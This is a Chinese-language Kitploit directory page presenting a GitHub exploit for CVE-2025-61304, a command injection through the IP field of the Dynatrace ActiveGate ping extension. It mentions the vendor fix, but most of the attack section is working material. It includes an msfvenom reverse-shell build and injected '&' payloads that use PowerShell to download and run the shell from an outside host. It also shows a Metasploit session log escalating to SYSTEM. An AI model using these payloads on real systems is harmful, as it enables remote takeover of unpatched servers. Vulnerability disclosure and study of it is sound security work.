Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-61304 — Dynatrace ActiveGate ping扩展高达1.016版本存在通过精心构造的IP地址引发的操作系统命令注入漏洞。 | Kitploit
工具/GitHubGitHub/pentastic-be/cve-2025-61304
权限提升Payload生成漏洞分析漏洞利用Web应用程序漏洞利用后渗透利用
GitHubpentastic-be/cve-2025-61304

CVE-2025-61304

Dynatrace ActiveGate ping扩展高达1.016版本存在通过精心构造的IP地址引发的操作系统命令注入漏洞。

查看仓库
2210个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-61304

Dynatrace ActiveGate ping扩展(版本1.016及以下)中通过精心构造的IP地址存在的OS命令注入漏洞

在后台,ping扩展使用Windows命令提示符来执行ping操作。测试目标主机的输入字段长度为1024个字符。在IP地址之后,只需使用'&'即可写入额外命令供ActiveGate执行。

已向Dynatrace报告,并通过此提交修复: https://github.com/Dynatrace/dynatrace-api/pull/99

利用RCE添加用户:

添加用户

本地用户列表前后对比:

利用

其他示例载荷:

  1. 创建meterpreter反向shell:
root@kitploit:~
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.51.200 LPORT=4444 -f exe > mshell.exe
  1. 通过云接口使用ping扩展在ActiveGate上下载并执行shell:
root@kitploit:~
google&powershell.exe $ProgressPreference = 'SilentlyContinue'; Invoke-WebRequest http://192.168.51.200/mshell.exe -OutFile c:\test\mshell.exe

google&c:\test\mshell.exe

  1. 结果会话
root@kitploit:~
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.51.200:4444 

[*] Sending stage (200262 bytes) to 192.168.51.54
[*] Meterpreter session 3 opened (192.168.51.200:4444 -> 192.168.51.54:49800 ) at 2023-01-21 19:02:16 +0100

meterpreter > getuid
Server username: NT AUTHORITY\LOCAL SERVICE
meterpreter > getsystem 
...got system via technique 5 (Named Pipe Impersonation (PrintSpooler variant)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

meterpreter > sysinfo
Computer        : WIN-9493M3CRTDV
OS              : Windows 2016+ (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows
下载工具